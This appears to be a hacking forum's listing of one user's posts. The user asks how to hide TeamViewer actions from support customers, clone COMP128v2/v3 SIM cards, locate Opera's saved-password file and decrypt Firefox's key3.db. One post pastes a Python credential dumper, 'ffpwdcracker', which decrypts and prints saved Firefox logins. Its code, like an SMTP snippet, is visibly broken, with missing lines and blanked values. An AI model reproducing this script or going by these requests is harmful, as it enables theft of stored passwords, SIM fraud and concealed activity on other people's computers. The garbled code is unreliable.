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Messages - fox12345

Pages: [1] 2
General discussion / Re: How to use teamviewer in stealth mode
« on: March 18, 2014, 10:05:30 AM »
Yeah.......i am working at freelancer.........So what to do? Some times my other sellers watching my activities and they after that they will provide it. So do not like that.

General discussion / Re: How to use teamviewer in stealth mode
« on: March 18, 2014, 09:47:44 AM »
Actually i want to hide my steps. Yeah customers are do not like that. But business is depending on that point.   

General discussion / How to use teamviewer in stealth mode
« on: March 18, 2014, 09:20:24 AM »
Hi dear friends, Today i want to emergency help!!! I will doing Remote Technical Support with TeamViewer. But it have not Stealth mode. As a result My customers are always looking my tricks and my methods. Like as "How to fix Problems" And after that  next time he will do it itself. As a result my business field is go down. So i want to do some Tricks with stealth mode. But TeamViewer is not supporting to that. Please give me a some good answer to that.


General discussion / Clone sim card comp128 V3
« on: November 29, 2013, 10:55:28 AM »

Dear All

Sim cards are manufactured on the basis of 3 algorithms....... COMP128v1,COMP128v2 and COMP128v3. Now an important note  currently only COMP128v1 version sim cards can be cloned. So I have COMP128v2 and COMP128v3 sim cards. Actually I want to clone that sim cards.
* How to Clone COMP128v2 and COMP128v3 Sim Cards?
* What are the Software base Tolls?


Please any one help me.

I have sim card reader and 6 in 1 super sim.

Scripting Languages / Re: Python : without .NET
« on: October 21, 2013, 01:49:19 PM »
Thank you for all compiling software is perfect..easy to work with that and no any issues of that , I'm using "py2exe".  i really need to know how to use  ".NET" with out windows machine  final "EXE" (compiled  "exe") .
Any code for that? or how is get that coding and how to import that...

Scripting Languages / Python : without .NET
« on: October 19, 2013, 06:20:30 AM »
When writing in python & once we compile "exe" in python program, How we use it without the ".NET"? Can we do it? When we write a python program can we import an any of module to do this?

General discussion / Re: Opera 16.0 passwords saved location?
« on: October 14, 2013, 11:16:32 AM »
i am locked the opera web site.but i have not a good result.

General discussion / Opera 16.0 passwords saved location?
« on: October 13, 2013, 12:00:39 PM »
Old version of Opera web browser's password is saving in this file 'Wand.dat' but the v of 16.0 location has changed & cannot find the 'Wand.dat' file.In under which file the password is saving?   


C:\Users\<username>\AppData\Roaming\Opera Software\Opera Stable\

There is no WAND.DAT file in new version. So what is the new file name and the location of the file?

Code: [Select]

import zipfile
A = zipfile.ZipFile("", "w")

Scripting Languages / How can I fetch emails through a proxy?
« on: October 10, 2013, 06:08:57 AM »
Dear friends,
I want to write basic program to send email. so i use this script. as well as want to use proxy. So how to do it? please help me ... "exactly i want to send email through a proxy or proxy chain" How to develop this code?

Code: [Select]
import smtplib
fromaddr = ''
toaddrs = ''
msg = ''
username = ''
password = ''
server = smtplib . SMTP ( ' 587' )
server. ehlo ( )
server. starttls ( )
server. ehlo ( )
server. login ( username , password )
server. sendmail ( fromaddr , toaddrs , msg )
server. quit ( )

Scripting Languages / Re: anyone help me?
« on: September 30, 2013, 12:12:12 PM »
Yes I understands.
But I have a problem.
"Firefox stores password data in two files: key3.db (Master Password / Encryption key) and a "signons" file (encrypted names and passwords) "

So what is the  (KEY = / IV = ) to decrypt the key3.db?where is it?
Google is good dear....But now i am really feeling tired*

Scripting Languages / anyone help me?
« on: September 30, 2013, 09:27:13 AM »

I write python script to read "test.db" file and save data to txt file. it is working well. i am really happy about it. it is my first script. then i know how to read ".db" file and extract the data.

so now i want your help to decrypt the key3.db file. how to do it? please help me.
exactly i want decrypt to encrypted "key3.db" with python script.

The passwords stored in this sign-on file are encrypted using Triple-DES followed by BASE64 encoding mechanism

Scripting Languages / Re: Crack Firefox passwords with python
« on: September 29, 2013, 07:30:08 AM »
hi dear  proxx,
Yes i write python script to read "test.db" file and save data to txt file. it is working well. i am really happy about it. it is my first script. then i know how to read ".db" file and extract the data.

so now i want your help to decrypt the key3.db file. how to do it? please help me.
exactly i want decrypt to encrypted "key3.db" with python script. 

Scripting Languages / Re: Crack Firefox passwords with python
« on: September 23, 2013, 12:18:45 PM »
Thank you for your reply. Actually I want modify  this script to windows Pc. I want to use this Decrypt Part. as well as only python. So i use this script to get some idea. Please help me...what to do?
Please read this:
" ffpasscracker - I promised you Python, so here's a solution. This uses the library as a loaded DLL. To use this on Windows, you can use these cygwin DLL's. "

I do not want to use some DLL downloading software. Only past option or CMD Based installation.

Scripting Languages / Crack Firefox passwords with python
« on: September 23, 2013, 11:42:04 AM »
I've been keeping a lookout for
I use your script and run it in test mode with my windows 8 pc. I changed some options. but i have not a good result.

I Download "cygwin1.dll","cygwin.dll" and install it my pc. it is give me a error massage.

command > regsvr32 cygwin1.dll

error 1 > "The module "cygwin1.dll" may not compatible with the version of windows that you're running. Check if the module is compatible with an x86 or 64 version of regsvr32.exe"

error 2 > The Module "cygwin1.dll failed to load. Make sure the binary is stored at the specified path or debug it to check for problems with the binary or dependent .DLL files. The specified module could not be found. (But cygwin1.dll is really at the system32 folder)

Same result to cygwin.dl

So how to fix this problem?
How to run this script in my windows 8 pc without any problem?
What to do?
I need serious help with that......

Code: [Select]
#!/usr/bin/env python
# ffpwdcracker - Crack the passwords stored using Firefox browser. The script currently works only on Linux.
# Author : Pradeep Nayak (
# usage: ffpwdcracker [paths_to_location_of_files]
# Run it with no paramters to extract the standard Passwords from all Profiles of the current
# logged in User.
# Required files:
#    + key3.db
#    + signongs.sqlite
#    + cert8.db
# are used and needed to collect the passwords.
from ctypes import *
import struct
import sys
import os
import glob
import re
import time
import base64

#Password structures
class SECItem(Structure):
   _fields_ = [('type',c_uint),('data',c_void_p),('len',c_uint)]

class secuPWData(Structure):
   _fields_ = [('source',c_ubyte),('data',c_char_p)]


def findpath_userdirs():
   appdata = os.getenv('HOME')
   usersdir = appdata+os.sep+".mozilla"+os.sep+'firefox'
   userdir = os.listdir(usersdir)
   for user in userdir:
      if os.path.isdir(usersdir+os.sep+user):
   return res

def errorlog(row,path):
   print "----[-]Error while Decoding! writting error.log:"
   print libnss.PORT_GetError()
      f.write("#ERROR in: %s at %s\n" %(path,time.ctime()))
      f.write("Site: %s\n"%row[1])
      f.write("Username: %s\n"%row[6])
      f.write("Password: %s\n"%row[7])
   except IOError:
      print "Error while writing logfile - No log created!"

#reads the signons.sqlite which is a sqlite3 Database (>Firefox 3)
def readsignonDB(userpath,dbname):
   if libnss.NSS_Init(userpath)!=0:
      print """Error Initalizing NSS_Init,\n
      propably no usefull results"""
   print "Dirname: %s"%os.path.split(userpath)[-1]
   import sqlite3
   conn = sqlite3.connect(userpath+os.sep+dbname)
   c = conn.cursor()
   c.execute("SELECT * FROM moz_logins;")
   for row in c:
      print "--Site(%s):"%row[1]  = cast(c_char_p(base64.b64decode(row[6])),c_void_p)
      uname.len = len(base64.b64decode(row[6])) = cast(c_char_p(base64.b64decode(row[7])),c_void_p)
      if libnss.PK11SDR_Decrypt(byref(uname),byref(dectext),byref(pwdata))==-1:
      print "----Username %s" % string_at(,dectext.len)
      if libnss.PK11SDR_Decrypt(byref(passwd),byref(dectext),byref(pwdata))==-1:
      print "----Password %s" % string_at(,dectext.len)

################# MAIN #################
if len(sys.argv)==1:
   ordner = findpath_userdirs()

#Load the libnss3 linked file
libnss = CDLL("")

pwdata = secuPWData()
pwdata.source = PW_NONE

uname = SECItem()
passwd = SECItem()
dectext = SECItem()

for user in ordner:
   signonfiles = glob.glob(user+os.sep+"signons*.*")
   for signonfile in signonfiles:
      (filepath,filename) = os.path.split(signonfile)
      filetype = re.findall('\.(.*)',filename)[0]
      if filetype.lower() == "sqlite":
         print "Unhandled Signons File: %s" % filename
         print "Skipping"

It is original source code.....

Pages: [1] 2

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